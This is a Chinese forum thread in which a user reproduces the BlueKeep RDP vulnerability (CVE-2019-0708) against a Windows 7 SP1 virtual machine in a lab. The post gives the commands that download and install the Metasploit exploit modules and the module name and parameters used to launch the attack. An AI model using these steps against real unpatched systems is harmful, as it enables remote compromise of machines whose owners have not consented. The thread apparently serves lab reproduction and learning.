搜索
    Hi~登录注册
    查看: 159|回复: 3
    收起左侧

    复现远程桌面漏洞CVE-2019-0708

    [复制链接]

    18

    主题

    0

    精华

    15 小时

    在线时间

    密圈

    积分
    16
    发表于 2019-9-10 19:22:26 | 显示全部楼层 |阅读模式
    2019年9月7日晚上凌晨1点左右,有老哥在github上发布了0708的漏洞利用程序。
    顿时群和朋友圈都爆炸了。
    QQ截图20190910191542.png
    QQ截图20190910191522.png
    首先是靶机,这里的靶机是使用清水表哥提供的win7sp1的系统
    漏洞环境 使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接: cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso (3.19 GB)
    如果用上面的系统,vm虚拟机安装的时候默认是家庭版的,所以在安装的时候要选择一下。
    QQ截图20190910191621.png
    安装好如下:

    QQ截图20190910191647.png
    0708漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。所以3389端口当然要打开啦。
    QQ截图20190910191714.png
    靶机工作完成。
    攻击机我这里用的是kali里面的msf,而且msf我以前有卸载了重新安装过。 所以我先看看我msf安装的路径在哪里。
    [AppleScript] 纯文本查看 复制代码
    find / -name 'metasploit'
    QQ截图20190910191756.png
    我的路径是安装在/opt目录下。
    首先,我们需要下载好攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
    [AppleScript] 纯文本查看 复制代码
    wget [url]https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb[/url]
    
    wget [url]https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb[/url]
    
    wget [url]https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb[/url]
    
    wget [url]https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb[/url]
    QQ截图20190910191835.png
    下载下来后,直接复制到对应的路径。
    [AppleScript] 纯文本查看 复制代码
    cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/
    
    cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/
    如果这里没有rdp目录,就用mkdir命令创建一个rdp目录
    [AppleScript] 纯文本查看 复制代码
    cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/[/size][/font][/color][/align]
    
    [align=center]cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

    QQ截图20190910191923.png
    这时启动msf。
    QQ截图20190910191955.png
    更新一下msf

    QQ截图20190910192020.png
    更新以后使用reload_all重新加载0708rdp利用模块

    QQ截图20190910192044.png
    [AppleScript] 纯文本查看 复制代码
    use exploit/rdp/cve_2019_0708_bluekeep_rce

    QQ截图20190910192116.png
    主要设置的参数有RHOSTS / RPORT / target
    • RHOSTS 靶机ip
    • RPORT rdp端口
    • target ID数字(可选为0-4)设置受害机机器架构



    QQ截图20190910192152.png







    上一篇:【CTF-PWN】pwn5-cgpwn2
    下一篇:分享个过狗、360网站卫士、JSP Webshell

    评分

    参与人数 1网币 +5 收起 理由
    管理01 + 5 感谢发布原创作品,极安中国有你更精彩!.

    查看全部评分

    回复

    使用道具 举报

    0

    主题

    0

    精华

    31 小时

    在线时间

    新手上路

    Rank: 1

    积分
    6
    发表于 2019-11-8 09:49:53 | 显示全部楼层
    攻击套件下载不下来是什么 原因啊?
    回复 支持 反对

    使用道具 举报

    27

    主题

    0

    精华

    66 小时

    在线时间

    密圈

    积分
    25
    发表于 2019-11-8 09:57:30 | 显示全部楼层
    小糖豆吃芥末 发表于 2019-11-8 09:49 AM
    攻击套件下载不下来是什么 原因啊?

    可能需要翻墙
    回复 支持 反对

    使用道具 举报

    9

    主题

    0

    精华

    85 小时

    在线时间

    荣誉会员

    Rank: 8Rank: 8

    积分
    111
    发表于 2019-11-8 22:00:35 | 显示全部楼层
    有时间得照着老哥的路子试试
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表